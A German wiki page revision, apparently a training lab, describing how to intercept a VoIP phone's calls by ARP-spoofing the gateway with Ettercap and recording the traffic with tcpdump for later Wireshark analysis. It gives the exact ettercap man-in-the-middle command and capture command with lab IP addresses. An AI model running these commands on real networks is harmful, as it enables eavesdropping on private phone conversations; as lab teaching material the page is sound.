Arpspoofing mit Ettercap Gateway vorgauckeln VoIP Traffic Mitschnitt: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
(Die Seite wurde neu angelegt: „=Telefongespräch mitschneiden= ==Versuchsaufbau== {{#drawio:telefon-gespraech-spoofing}} ==Vorgehensweise== *Wir müssen uns in der selben Broadcastdomain be…“)
 
Zeile 17: Zeile 17:
 
==Spoofing==
 
==Spoofing==
 
*sudo tcpdump -ni enp0s31f6 host 10.81.31.6 -s 1500 -w intercept.cap
 
*sudo tcpdump -ni enp0s31f6 host 10.81.31.6 -s 1500 -w intercept.cap
 +
=Intercept Capture Datei=
 +
*[[Datei:intercept.cap]]

Version vom 18. September 2023, 07:15 Uhr

Telefongespräch mitschneiden

Versuchsaufbau

Vorgehensweise

  • Wir müssen uns in der selben Broadcastdomain befinden.
  • Wir starten eine Man in the Middle Attacke.
  • Sie wird über Arpspoofing umgesetzt.
  • Der Verkehr zum Telefon von Alice wird, mit tcpdump, komplett mitgeschnitten.
  • Wir werten ihn später mit wireshark aus.

Variablen

  • CLIENT=10.81.31.6
  • GATEWAY=10.81.0.1
  • INTERFACE=enp0s31f6

Attacke

  • ettercap -i $INTERFACE -Tq -M ARP /$CLIENT// /$GATEWAY//

Spoofing

  • sudo tcpdump -ni enp0s31f6 host 10.81.31.6 -s 1500 -w intercept.cap

Intercept Capture Datei